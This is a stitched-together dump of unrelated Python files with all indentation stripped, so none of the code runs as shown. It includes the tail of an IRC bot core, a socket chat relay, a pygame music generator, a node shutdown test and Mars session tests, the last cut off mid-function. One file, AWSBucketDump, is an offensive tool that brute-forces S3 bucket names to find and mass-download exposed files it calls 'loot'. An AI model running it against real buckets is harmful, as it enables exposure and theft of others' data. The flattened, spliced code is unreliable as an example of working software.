trace = traceback.format_exc()
stderr(trace)
self.debug(
__file__,
'Fatal error in core, please review exception log',
'always'
)
# TODO: make not hardcoded
logfile = codecs.open(
os.path.join(self.config.logdir, 'exceptions.log'),
'a',
encoding='utf-8'
)
logfile.write('Fatal error in core, handle_error() was called\n')
logfile.write('last raw line was %s' % self.raw)
logfile.write(trace)
logfile.write('Buffer:\n')
logfile.write(self.buffer)
logfile.write('----------------------------------------\n\n')
logfile.close()
if self.error_count > 10:
if (datetime.now() - self.last_error_timestamp).seconds < 5:
print >> sys.stderr, "Too many errors, can't continue"
os._exit(1)
self.last_error_timestamp = datetime.now()
self.error_count = self.error_count + 1
if self.config.exit_on_error:
os._exit(1)
#Helper functions to maintain the oper list.
#They cast to Nick when adding to be quite sure there aren't any accidental
#string nicks. On deletion, you know you'll never need to worry about what
#the real superclass is, so we just cast and remove.
def add_op(self, channel, name):
if isinstance(name, Nick):
self.ops[channel].add(name)
else:
self.ops[channel].add(Nick(name))
def add_halfop(self, channel, name):
if isinstance(name, Nick):
self.halfplus[channel].add(name)
else:
self.halfplus[channel].add(Nick(name))
def add_voice(self, channel, name):
if isinstance(name, Nick):
self.voices[channel].add(name)
else:
self.voices[channel].add(Nick(name))
def del_op(self, channel, name):
self.ops[channel].discard(Nick(name))
def del_halfop(self, channel, name):
self.halfplus[channel].discard(Nick(name))
def del_voice(self, channel, name):
self.voices[channel].discard(Nick(name))
def flush_ops(self, channel):
self.ops[channel] = set()
self.halfplus[channel] = set()
self.voices[channel] = set()
def init_ops_list(self, channel):
if not channel in self.halfplus:
self.halfplus[channel] = set()
if not channel in self.ops:
self.ops[channel] = set()
if not channel in self.voices:
self.voices[channel] = set()
if __name__ == "__main__":
print __doc__
|
client communicator.py
|
import socket,time
from threading import Thread
from socket import *
servers=[]
clients=[]
s=socket(AF_INET,SOCK_STREAM)
host="0.0.0.0"
port=10000
s.bind((host,port))
s2=socket(AF_INET,SOCK_STREAM)
address=gethostbyname(getfqdn())
s2.connect((address,10500))
def main_send(msg):
s2.send(bytes(str(msg),'utf-8'))
def main_recive():
data2=s2.recv(1024)
data2=data2.decode('utf-8')
return data2
lol=main_recive()
if lol=="type?":
main_send("Client Communicator")
else:
print("did not get type? command form main server shutting down...")
time.sleep(3)
exit()
def send(c,msg):
c.send(bytes(str(msg),'utf-8'))
def recive(c,a):
data=c.recv(1024)
data=data.decode('utf-8')
return data
def handler(c,a):
send(c,str(servers).replace("[","").replace("]","").replace(",","\n"))
while True:
data=recive(c,a)
if data[0:1]=="$":
data2=data[1:]
if "connect "in data2[0:8]:
pass
elif data2=="list_servers":
send(c,str(servers).replace("[","").replace("]","").replace(",","\n"))
elif data2=="man_update":
main_send("Comm: send serverslist")
serv_list=main_recive()
serv_list=str(serv_list).split(",")
send(c,str(serv_list).replace("[","").replace("]","").replace(",","\n"))
elif data2=="help":
print("""help-list commands
connect -connects you to a server EX:connect server0,me (you don't type this part in but the reason it allows you to do that is to drag people into the same server as you if you know their ip address)
list_server-list servers that it alredy has listed
man_update-manually updates it for your eyes only it does not update the server list for everyone and will list it to you
exit-exits you from the communicator SAFELY AND IT'S RECOMMANDED TO DO THIS""")
elif data2=="exit":
send(c,"thank you for useing the communicator even if you did not get in to a server probably goob-bye!")
send(c,"you are safe to close the program")
c.close()
def server_checker(c,a):
while True:
servers.clear()
main_send("Comm: send serverslist")
serv_list=main_recive()
serv_list=str(serv_list).split(",")
server=0
for serv in serv_list:
server+=1
servers.append(serv)
time.sleep(1200)
for client in clients:
send(client,"theres an updated version of the servers list would you would need to type $list_servers you got to wait 10 secs beofere manually update the servers list")
while True:
c,a=s.accept()
clients.append(c)
sc=Thread(target=server_checker,args=(c,a))
sc.start()
handler(c,a)
|
AWSBucketDump.py
|
#!/usr/bin/env python
# AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
# It's similar to a subdomain bruteforcer but is made specifically to S3
# buckets and also has some extra features that allow you to grep for
# delicious files as well as download interesting files if you're not
# afraid to quickly fill up your hard drive.
# by Jordan Potti
# @ok_bye_now
from argparse import ArgumentParser
import codecs
import requests
import xmltodict
import sys
import os
import shutil
import traceback
from queue import Queue
from threading import Thread, Lock
bucket_q = Queue()
download_q = Queue()
grep_list = None
arguments = None
def fetch(url):
print('Fetching ' + url + '...')
response = requests.get(url)
if response.status_code == 403:
status403(url)
elif response.status_code == 404:
status404(url)
elif response.status_code == 200:
if "Content" in response.text:
returnedList=status200(response,grep_list,url)
def bucket_worker():
while True:
item = bucket_q.get()
try:
fetch(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
bucket_q.task_done()
def downloadWorker():
print('Download worker running...')
while True:
item = download_q.get()
try:
downloadFile(item)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
download_q.task_done()
directory_lock = Lock()
def get_directory_lock():
directory_lock.acquire()
def release_directory_lock():
directory_lock.release()
def get_make_directory_return_filename_path(url):
global arguments
bits = url.split('/')
directory = arguments.savedir
for i in range(2,len(bits)-1):
directory = os.path.join(directory, bits[i])
try:
get_directory_lock()
if not os.path.isdir(directory):
os.makedirs(directory)
except Exception as e:
traceback.print_exc(file=sys.stdout)
print(e)
finally:
release_directory_lock()
return os.path.join(directory, bits[-1]).rstrip()
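# Illustrative example (added note): for url 'http://bucket.s3.amazonaws.com/dir/file.txt'
# and an empty --savedir, bits[2:-1] are ('bucket.s3.amazonaws.com', 'dir'), so the file
# is saved to 'bucket.s3.amazonaws.com/dir/file.txt' relative to the working directory.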
interesting_file_lock = Lock()
def get_interesting_file_lock():
interesting_file_lock.acquire()
def release_interesting_file_lock():
interesting_file_lock.release()
def write_interesting_file(filepath):
try:
get_interesting_file_lock()
with open('interesting_file.txt', 'ab+') as interesting_file:
interesting_file.write(filepath.encode('utf-8'))
interesting_file.write('\n'.encode('utf-8'))
finally:
release_interesting_file_lock()
def downloadFile(filename):
global arguments
print('Downloading {}'.format(filename) + '...')
local_path = get_make_directory_return_filename_path(filename)
local_filename = (filename.split('/')[-1]).rstrip()
print('local {}'.format(local_path))
if local_filename =="":
print("Directory..\n")
else:
r = requests.get(filename.rstrip(), stream=True)
if 'Content-Length' in r.headers:
if int(r.headers['Content-Length']) > arguments.maxsize:
print("This file is greater than the specified max size... skipping...\n")
else:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
r.close()
def print_banner():
print('''\nDescription:
AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for loot.
It's similar to a subdomain bruteforcer but is made specifically to S3
buckets and also has some extra features that allow you to grep for
delicious files as well as download interesting files if you're not
afraid to quickly fill up your hard drive.
by Jordan Potti
@ok_bye_now'''
)
def cleanUp():
print("Cleaning up files...")
def status404(line):
# print(line.rstrip() + " NoSuchBucket.")
pass
def status403(line):
print(line.rstrip() + " Exists but AccessDenied.")
def queue_up_download(filepath):
download_q.put(filepath)
print('Collectable: {}'.format(filepath))
write_interesting_file(filepath)
def status200(response,grep_list,line):
print("Pilfering "+line.rstrip() + '...')
objects=xmltodict.parse(response.text)
Keys = []
interest=[]
try:
for child in objects['ListBucketResult']['Contents']:
Keys.append(child['Key'])
except:
pass
hit = False
for words in Keys:
words = (str(words)).rstrip()
collectable = line+'/'+words
if grep_list != None and len(grep_list) > 0:
for grep_line in grep_list:
grep_line = (str(grep_line)).rstrip()
if grep_line in words:
queue_up_download(collectable)
break
else:
queue_up_download(collectable)
def main():
global arguments
global grep_list
parser = ArgumentParser()
parser.add_argument("-D", dest="download", required=False, action="store_true", default=False, help="Download files. This requires significant disk space.")
parser.add_argument("-d", dest="savedir", required=False, default='', help="If -D, then -d 1 to create save directories for each bucket with results.")
parser.add_argument("-l", dest="hostlist", required=True, help="")
parser.add_argument("-g", dest="grepwords", required=False, help="Provide a wordlist to grep for.")
parser.add_argument("-m", dest="maxsize", type=int, required=False, default=1024, help="Maximum file size to download.")
parser.add_argument("-t", dest="threads", type=int, required=False, default=1, help="Number of threads.")
if len(sys.argv) == 1:
print_banner()
parser.error("No arguments given.")
parser.print_usage()
sys.exit()
# output parsed arguments into a usable object
arguments = parser.parse_args()
# specify primary variables
if arguments.grepwords:
    with open(arguments.grepwords, "r") as grep_file:
        grep_content = grep_file.readlines()
        grep_list = [g.strip() for g in grep_content]
if arguments.download and arguments.savedir:
print("Downloads enabled (-D), save directories (-d) for each host will be created/used.")
elif arguments.download and not arguments.savedir:
print("Downloads enabled (-D), will be saved to current directory.")
else:
print("Downloads were not enabled (-D), not saving results locally.")
# start up bucket workers
for i in range(0,arguments.threads):
print('Starting thread...')
t = Thread(target=bucket_worker)
t.daemon = True
t.start()
# start download workers
for i in range(1, arguments.threads):
t = Thread(target=downloadWorker)
t.daemon = True
t.start()
with open(arguments.hostlist) as f:
for line in f:
bucket = 'http://'+line.rstrip()+'.s3.amazonaws.com'
print('Queuing {}'.format(bucket) + '...')
bucket_q.put(bucket)
bucket = 'http://'+line.rstrip()+'.s3-accelerate.amazonaws.com'
print('Queuing {}'.format(bucket) + '...')
bucket_q.put(bucket)
bucket_q.join()
if arguments.download:
download_q.join()
cleanUp()
if __name__ == "__main__":
main()
|
music_gen_gui.py
|
#!/usr/bin/env python
import pygame
from music_generation import *
from sound_generation import *
from constants import *
from helpers import *
import math
import random as rd
import time
import threading
import sys
import random
class MusGUI(object):
def __init__(self):
pygame.mixer.pre_init(44100, 16, 1, 4096)
pygame.init()
pygame.font.init()
self.screen_commit = pygame.display.set_mode(WINDOW_SIZE)
self.screen = pygame.Surface(FRAME_SIZE)
pygame.display.set_caption("Pytchie - Random Music Synthesis")
self.print_font = pygame.font.Font(fp("Myriad.otf"), int(16 * SCALE_X))
self.most_recent_print = ""
self.print_text = self.most_recent_print
self.most_recent_print_time = ""
self.title_font = pygame.font.Font(fp("Myriad.otf"), int(22 * SCALE_X))
texts = ["LEAD", "BASS", "COMP", "PERC", "MIX"]
self.titles = [self.title_font.render(text, 1, (200, 200, 200)) for text in texts]
link_font = pygame.font.Font(fp("Myriad.otf"), int(16 * SCALE_X))
self.link = link_font.render("github.com/jeremycryan/pytchie", 1, (120, 120, 120))
self.spinner_sprite = SpinnerSprite(self.screen_commit)
self.last_spinner_draw = time.time()
self.loading = False
self.threads = []
self.main()
def gui_print(self):
text = "%s: %s" % (str(self.most_recent_print_time), self.print_text.upper())
a = self.print_font.render(text, 1, (180, 180, 180))
self.screen.blit(a, (int(20 * SCALE_X), int(FRAME_HEIGHT * 0.95)))
def gui_print_text(self, text):
self.print_text = text
self.most_recent_print_time = int(time.time() % 1000 * 100) / 100.0
def draw_titles(self):
self.screen.blit(self.titles[0], (int(0.08 * FRAME_WIDTH), int((LEAD_Y) * FRAME_HEIGHT)))
self.screen.blit(self.titles[4], (int(0.08 * FRAME_WIDTH), int(MIX_Y * FRAME_HEIGHT)))
self.screen.blit(self.titles[1], (int(0.08 * FRAME_WIDTH), int(BASS_Y * FRAME_HEIGHT)))
self.screen.blit(self.titles[3], (int(0.08 * FRAME_WIDTH), int(SNARE_Y * FRAME_HEIGHT)))
self.screen.blit(self.titles[2], (int(0.08 * FRAME_WIDTH), int(COMP_Y * FRAME_HEIGHT)))
self.screen.blit(self.link,
(int(0.63 * FRAME_WIDTH),
int(0.85 * FRAME_HEIGHT)))
def main(self):
then = time.time()
self.click = False
generate = Button(pos=(0.83, 0.925), text="GENERATE")
randomize = Button(pos=(0.66, MIX_Y + MIX_SPACING_Y / 2), text="RANDOMIZE")
tempo = Gauge(pos=(0.2, MIX_Y), label="TEMPO", min_val=60, max_val=180, starting_val=120, size=(0.383, 0.05))
chord_1 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 0 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=5)
chord_2 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 1 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=3)
chord_3 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 2 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=0)
chord_4 = ModeButton(size=(0.11, 0.05), pos=(0.2 + 3 * MIX_SPACING_X, MIX_Y + MIX_SPACING_Y),
texts=["I", "ii", "iii", "IV", "V", "vi", "vii", "RAND"], start_mode=4)
lead_instrument_button = ModeButton(pos=(0.2, LEAD_Y + LEAD_SPACING),
texts=["RANDOM", "FLUTE", "TRUMPET", "VIOLIN", "SNARE"])
lead_enable = ToggleButton(pos=(0.2, LEAD_Y))
lead_intricacy = Gauge(pos=(0.38, LEAD_Y), size=(0.5, 0.05), bar_color=BLUE, label="INTRICACY",
starting_val=0.7)
lead_temerity = Gauge(pos=(0.38, LEAD_Y + LEAD_SPACING), size=(0.5, 0.05), bar_color=BLUE, label="TEMERITY",
starting_val=0.7)
bass_enable = ToggleButton(pos=(0.2, BASS_Y))
bass_instrument_button = ModeButton(pos=(0.2, BASS_Y + LEAD_SPACING), texts=["RANDOM", "SAWTOOTH", "SQUARE"])
bass_intricacy = Gauge(pos=(0.38, BASS_Y), size=(0.5, 0.05), bar_color=BLUE, label="INTRICACY",
starting_val=0.3)
bass_temerity = Gauge(pos=(0.38, BASS_Y + BASS_SPACING), size=(0.5, 0.05), bar_color=BLUE, label="TEMERITY",
starting_val=0.3)
snare_enable = ToggleButton(pos=(0.2, SNARE_Y))
snare_intricacy = Gauge(pos=(0.38, SNARE_Y), size=(0.5, 0.05), bar_color=BLUE, label="INTRICACY",
starting_val=0.5)
comp_enable = ToggleButton(pos=(0.2, COMP_Y))
comp_instrument_button = ModeButton(pos=(0.38, COMP_Y), texts=["RANDOM", "FLUTE", "TRUMPET", "VIOLIN"])
self.buttons = [generate, randomize, lead_enable, lead_instrument_button,
bass_instrument_button, bass_enable, chord_1, chord_2, chord_3, chord_4,
snare_enable, comp_enable, comp_instrument_button]
self.gauges = [lead_intricacy, lead_temerity, tempo, bass_intricacy, bass_temerity,
snare_intricacy]
self.clicked = []
self.bleeps = []
while True:
now = time.time()
dt = now - then
then = now
chords = [chord.texts[chord.mode] for chord in [chord_1, chord_2, chord_3, chord_4]]
to_generate = False
if generate in self.clicked:
a = Song(4, tempo.value,
lead_intricacy=lead_intricacy.value,
lead_temerity=lead_temerity.value,
bass_intricacy=bass_intricacy.value,
bass_temerity=bass_temerity.value,
chords=chords,
snare_intricacy=snare_intricacy.value)
self.gui_print_text("Generating a sample song with your parameters...")
to_generate = 1
if randomize in self.clicked:
self.gui_print_text("Random values assigned to all fields.")
for item in self.buttons + self.gauges:
item.randomize_value()
self.check_events()
self.screen.fill((50, 50, 50))
bot_bar = pygame.Surface((FRAME_WIDTH, int(FRAME_HEIGHT * 0.10)))
self.screen.blit(bot_bar, (0, FRAME_HEIGHT - bot_bar.get_height()))
bot_bar.fill((0, 0, 0))
self.gui_print()
for item in self.buttons + self.gauges + self.bleeps:
if dt > 0.05:
dt = 0.05
item.update(dt)
item.draw(self.screen)
if item in self.bleeps:
if item.radius > item.max_radius:
self.bleeps.remove(item)
self.draw_titles()
if to_generate:
black = pygame.Surface((FRAME_WIDTH, int(FRAME_HEIGHT * 0.9)))
black.fill((0, 0, 0))
black.set_alpha(100)
self.screen.blit(black, (0, 0))
self.bleeps = []
screen = pygame.transform.scale(self.screen, WINDOW_SIZE)
self.screen_commit.blit(screen, (0, 0))
pygame.display.flip()
if to_generate:
self.show_spinner()
lead_instrument = a.label_to_instrument[lead_instrument_button.texts[lead_instrument_button.mode]]
comp_instrument = a.label_to_instrument[comp_instrument_button.texts[comp_instrument_button.mode]]
enables = [lead_enable.toggled, snare_enable.toggled, bass_enable.toggled, comp_enable.toggled]
self.loading = True
self.song_to_generate = a
self.generated_file_name = None
self.gen_args = {"lead_instrument": lead_instrument,
"comp_instrument": comp_instrument,
"enables": enables}
t = threading.Thread(target=self.generate_song)
t.start()
while threading.active_count() > 1:
self.update_and_draw_spinner()
self.check_for_pygame_exit()
self.loading = False
self.gui_print_text("%s generated and ready for playback." % self.generated_file_name)
self.hide_spinner()
def generate_song(self):
args = self.gen_args
self.generated_file_name = self.song_to_generate.generate_preset_0(**args)
sys.exit() # Close current thread
def update_and_draw_spinner(self):
screen = pygame.transform.scale(self.screen, WINDOW_SIZE)
now = time.time()
dt = now - self.last_spinner_draw
self.last_spinner_draw = now
self.screen_commit.blit(screen, (0, 0))
self.spinner_sprite.update(dt)
self.spinner_sprite.draw()
pygame.display.flip()
def show_spinner(self):
self.spinner_sprite.show()
def hide_spinner(self):
self.spinner_sprite.hide()
def check_for_pygame_exit(self):
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
self.close_all_threads()
def close_all_threads(self):
os._exit(1)
def check_events(self):
mouse_pos = pygame.mouse.get_pos()
click = False
old_click = self.click
new_click = pygame.mouse.get_pressed()[0]
self.check_for_pygame_exit()
self.clicked = []
if new_click and not old_click:
click = True
self.bleeps.append(Bleep(mouse_pos))
self.click = new_click
for button in self.buttons + self.gauges:
this_button_clicked = button.mouse_over(mouse_pos, click=click, held=new_click)
if this_button_clicked:
self.clicked.append(button)
class SpinnerSprite(object):
def __init__(self, screen):
super(SpinnerSprite, self).__init__()
self.screen = screen
self.images = []
self.tps = 3.5 # Number of 30-degree tooth increments turned each second
self.pps = 1 # Number of scale pulses each second
self.age = 0
self.visible = True
self.index = 0
self.spinner = pygame.image.load("images/spinner/frame-1.png")
self.x = WINDOW_WIDTH/2
self.y = WINDOW_HEIGHT/2
self.pulse_amplitude = 0.08 # Proportion of scale increase with pulse
self.scale = 0 # Starting scale
def show(self):
self.age = 0
self.visible = True
def hide(self):
self.visible = False
def update(self, dt):
if not self.visible:
return
self.age += dt
angle = (self.age * self.tps * 30) % 30
self.max_scale = self.age
self.scale = self.pulse_amplitude * math.sin(self.pps * 2 * math.pi * self.age) + 1
img = pygame.transform.rotozoom(self.spinner, -angle, min(self.scale, self.max_scale))
self.image = img
def draw(self):
if not self.visible:
return
x = int(self.x - self.image.get_width()/2)
y = int(self.y - self.image.get_height()/2)
self.screen.blit(self.image, (x, y))
class Bleep(object):
def __init__(self, pos):
self.x = int(pos[0]*SCALE_X)
self.y = int(pos[1]*SCALE_Y)
self.pos = [self.x, self.y]
self.radius = 1
self.max_radius = 20
def update(self, dt):
self.radius += dt * 150.0
def draw(self, screen):
pygame.draw.circle(screen, (255, 255, 255), self.pos, int(self.radius*SCALE_X), 2)
class Button(object):
def __init__(self, text="BUTTON", size=(0.2, 0.05), pos=(0.1, 0.1)):
self.width = size[0]
self.height = size[1]
self.pos = pos
self.x = int(self.pos[0] * FRAME_WIDTH)
self.y = int(self.pos[1] * FRAME_HEIGHT)
self.w = int(self.width * FRAME_HEIGHT)
self.h = int(self.height * FRAME_HEIGHT)
self.text = text
self.button_font = pygame.font.Font(fp("Myriad.otf"), int(16*SCALE_X))
self.button_font_render = self.button_font.render(self.text, 1, (0, 0, 0))
self.brr_w = self.button_font_render.get_width()
self.brr_h = self.button_font_render.get_height()
self.hovered = 0
self.hover_scale = 1.05
self.cur_scale = 1.0
self.target_scale = 1.0
self.h_color = (255, 255, 255)
self.color = (200, 200, 200)
self.toggled = 0
def randomize_value(self):
pass
def mouse_over(self, mpos, click=False, held=False):
clicked = 0
x, y = mpos
if x >= self.x / SCALE_X and x <= self.x / SCALE_X + self.w / SCALE_X:
if y >= self.y / SCALE_Y and y <= self.y / SCALE_Y + self.h / SCALE_Y:
if click:
self.toggled = 1 - self.toggled
self.cur_scale = 1.3
clicked = 1
self.hovered = True
return clicked
self.hovered = False
return clicked
def draw(self, screen):
if self.hovered:
color = self.h_color
else:
color = self.color
self.brr_w = self.button_font_render.get_width()
self.brr_h = self.button_font_render.get_height()
width = int(self.w * self.cur_scale)
height = int(self.h * self.cur_scale)
xdif = int((width - self.w) / 2)
ydif = int((height - self.h) / 2)
self.target_scale = self.hover_scale
if not self.hovered:
self.target_scale = 1.0
button_surf = pygame.Surface((self.w, self.h))
button_surf.fill(color)
font_center_pos = (int(self.x + self.w / 2), int(self.y + self.h / 2))
font_pos = (int(font_center_pos[0] - self.brr_w / 2),
int(font_center_pos[1] - self.brr_h / 2))
button_surf.blit(self.button_font_render, (self.w / 2 - self.brr_w / 2, self.h / 2 - self.brr_h / 2))
shadow = pygame.Surface((self.w, self.h / 2))
shadow.fill((0, 0, 0))
shadow.set_alpha(40)
button_surf.blit(shadow, (0, self.h / 2))
xoff = 0
yoff = 0
button_surf = pygame.transform.scale(button_surf, (int(self.w * self.cur_scale), int(self.h * self.cur_scale)))
screen.blit(button_surf, (self.x - xdif, self.y - ydif))
def update(self, dt):
ds = -self.cur_scale + self.target_scale
self.cur_scale += ds * dt * 20
class ToggleButton(Button):
def __init__(self, text="DISABLED", size=(0.2, 0.05), pos=(0.1, 0.1), toggle_text="ENABLED"):
Button.__init__(self, text=text, size=size, pos=pos)
self.toggled = True
self.untoggled_color = (100, 100, 100)
self.untoggled_color_2 = (120, 120, 120)
self.toggled_color = GREEN
self.toggled_color_2 = [c + 20 for c in GREEN]
self.untoggle_text = text
self.toggle_text = toggle_text
self.button_font_render_untoggled = self.button_font_render.copy()
self.button_font_render_toggled = self.button_font.render(self.toggle_text, 1, (0, 0, 0))
def randomize_value(self):
self.cur_scale = 1.3
self.toggled = 0
if rd.random() < 0.75:
self.toggled = 1
def update(self, dt):
ds = -self.cur_scale + self.target_scale
self.cur_scale += ds * dt * 20
if not self.toggled:
self.text = self.untoggle_text
self.button_font_render = self.button_font_render_untoggled
self.color = self.untoggled_color
self.h_color = self.untoggled_color_2
else:
self.text = self.toggle_text
self.button_font_render = self.button_font_render_toggled
self.color = self.toggled_color
self.h_color = self.toggled_color_2
class ModeButton(Button):
def __init__(self, texts=["MODE 1", "MODE 2", "MODE 3"], size=(0.2, 0.05), pos=(0.1, 0.1), start_mode=0):
Button.__init__(self, text=texts[0], size=size, pos=pos)
self.colors = {}
self.modes = [i for i in range(len(texts))]
self.colors = [COLORS[i % len(COLORS)] for i in self.modes]
self.hover_colors = [(min(c[0] + 20, 255), min(c[1] + 20, 255), min(c[2] + 20, 255)) for c in self.colors]
self.mode = self.modes[start_mode]
self.color = self.colors[self.mode]
self.h_color = self.hover_colors[self.mode]
self.texts = texts
self.font_renders = [self.button_font.render(texts[mode], 1, (0, 0, 0)) for mode in self.modes]
self.button_font_render = self.font_renders[start_mode]
# self.button_font_render = self.button_font.render(self.text, 1, (0, 0, 0))
def set_mode(self, mode):
self.cur_scale = 1.3
self.mode = mode
self.color = self.colors[self.mode]
self.h_color = self.hover_colors[self.mode]
self.button_font_render = self.font_renders[self.mode]
def randomize_value(self):
self.set_mode(rd.choice(self.modes))
def mouse_over(self, mpos, click=False, held=False):
clicked = 0
x, y = mpos
if x >= self.x / SCALE_X and x <= self.x / SCALE_X + self.w / SCALE_X:
if y >= self.y / SCALE_Y and y <= self.y / SCALE_Y + self.h / SCALE_Y:
if click:
self.toggled = 1 - self.toggled
self.cur_scale = 1.3
self.set_mode((self.mode + 1) % len(self.modes))
self.hovered = True
return clicked
self.hovered = False
return clicked
class Gauge(object):
def __init__(self, size=(0.4, 0.05), pos=(0.1, 0.1), max_val=1.0, min_val=0, starting_val=0.5, bar_color=RED,
label="GAUGE"):
self.w = size[0] * FRAME_WIDTH
self.h = size[1] * FRAME_HEIGHT
self.x = pos[0] * FRAME_WIDTH
self.y = pos[1] * FRAME_HEIGHT
self.background_color = (90, 90, 90)
self.meter_color = bar_color
self.meter_highlight = [min(c + 25, 255) for c in bar_color]
self.meter_text_color = (0, 0, 0) # [min(c+50, 255) for c in self.meter_highlight]
self.value = starting_val
self.max_val = max_val
self.min_val = min_val
self.dragging = 0
self.scale = 1.0
self.target_scale = 1.0
self.h_scale = 1.03
label_font = pygame.font.Font(fp("Myriad.otf"), int(16 * SCALE_X))
self.label = label_font.render(label, 1, self.meter_text_color)
def randomize_value(self):
self.scale = 1.12
per = rd.random()
self.value = per * (self.max_val - self.min_val) + self.min_val
def draw(self, screen):
meter_color = self.meter_color
if self.hovered or self.dragging:
meter_color = self.meter_highlight
back = pygame.Surface((int(self.w * self.scale), int(self.h * self.scale)))
back.fill(self.background_color)
per_val = 1.0 * (self.value - self.min_val) / (self.max_val - self.min_val)
meter = pygame.Surface((int(self.w * self.scale * per_val), int(self.h * self.scale)))
meter.fill(meter_color)
w = int(self.w * self.scale)
h = int(self.h * self.scale)
xdif = int(w - self.w) / 2
ydif = int(h - self.h) / 2
shadow = pygame.Surface((w, h))
shadow.fill((0, 0, 0))
shadow.set_alpha(40)
back.blit(meter, (0, 0))
back.blit(self.label, (int(10 * SCALE_X), h / 2 - self.label.get_height() / 2))
back = pygame.transform.scale(back, (w, h))
back.blit(shadow, (0, h / 2))
screen.blit(back, (self.x - xdif, self.y - ydif))
def update(self, dt):
if self.hovered or self.dragging:
self.target_scale = self.h_scale
else:
self.target_scale = 1.0
ds = -self.scale + self.target_scale
self.scale += ds * dt * 20
def mouse_over(self, mpos, click=False, held=False):
x, y = mpos
if self.dragging and not held:
self.dragging = False
self.scale = 1.08
if self.dragging:
bar_min = self.x / SCALE_X
bar_max = self.x / SCALE_X + self.w / SCALE_X
percent = 1.0 * (x - bar_min) / (bar_max - bar_min)
percent = max(min(percent, 1.0), 0.0)
self.value = (self.max_val - self.min_val) * percent + self.min_val
if x >= self.x / SCALE_X and x <= self.x / SCALE_X + self.w / SCALE_X:
if y >= self.y / SCALE_Y and y <= self.y / SCALE_Y + self.h / SCALE_Y:
self.hovered = True
if click:
self.dragging = True
elif not held:
self.dragging = False
return
self.hovered = False
if __name__ == '__main__':
a = MusGUI()
pass
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test lksd shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
test_session.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import sys
import tempfile
from collections import namedtuple
import numpy as np
import pandas as pd
import pytest
try:
import pyarrow as pa
except ImportError: # pragma: no cover
pa = None
import mars.tensor as mt
import mars.dataframe as md
import mars.remote as mr
from mars.config import option_context
from mars.deploy.utils import load_service_config_file
from mars.session import execute, fetch, fetch_log
test_namedtuple_type = namedtuple('TestNamedTuple', 'a b')
@pytest.fixture
def setup():
from ..deploy.oscar.tests.session import new_test_session
sess = new_test_session(address='127.0.0.1',
init_local=True,
default=True)
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_session_async_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
expected = raw_a.sum()
res = a.sum().to_numpy(wait=False).result()
assert expected == res
res = a.sum().execute(wait=False)
res = res.result().fetch()
assert expected == res
raw_df = pd.DataFrame(raw_a)
expected = raw_df.sum()
df = md.DataFrame(a)
res = df.sum().to_pandas(wait=False).result()
pd.testing.assert_series_equal(expected, res)
res = df.sum().execute(wait=False)
res = res.result().fetch()
pd.testing.assert_series_equal(expected, res)
t = [df.sum(), a.sum()]
res = mt.ExecutableTuple(t).to_object(wait=False).result()
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
res = mt.ExecutableTuple(t).execute(wait=False)
res = fetch(*res.result())
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
def test_executable_tuple_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
raw_df = pd.DataFrame(raw_a)
df = md.DataFrame(raw_df)
tp = test_namedtuple_type(a, df)
executable_tp = mt.ExecutableTuple(tp)
assert 'a' in dir(executable_tp)
assert executable_tp.a is a
assert test_namedtuple_type.__name__ in repr(executable_tp)
with pytest.raises(AttributeError):
getattr(executable_tp, 'c')
res = mt.ExecutableTuple(tp).execute().fetch()
assert test_namedtuple_type is type(res)
np.testing.assert_array_equal(raw_a, res.a)
pd.testing.assert_frame_equal(raw_df, res.b)
def test_multiple_output_execute(setup):
data = np.random.random((5, 9))
# test multiple outputs
arr1 = mt.tensor(data.copy(), chunk_size=3)
result = mt.modf(arr1).execute().fetch()
expected = np.modf(data)
np.testing.assert_array_equal(result[0], expected[0])
np.testing.assert_array_equal(result[1], expected[1])
# test 1 output
arr2 = mt.tensor(data.copy(), chunk_size=3)
result = ((arr2 + 1) * 2).to_numpy()
expected = (data + 1) * 2
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
arr3 = mt.tensor(data.copy(), chunk_size=3)
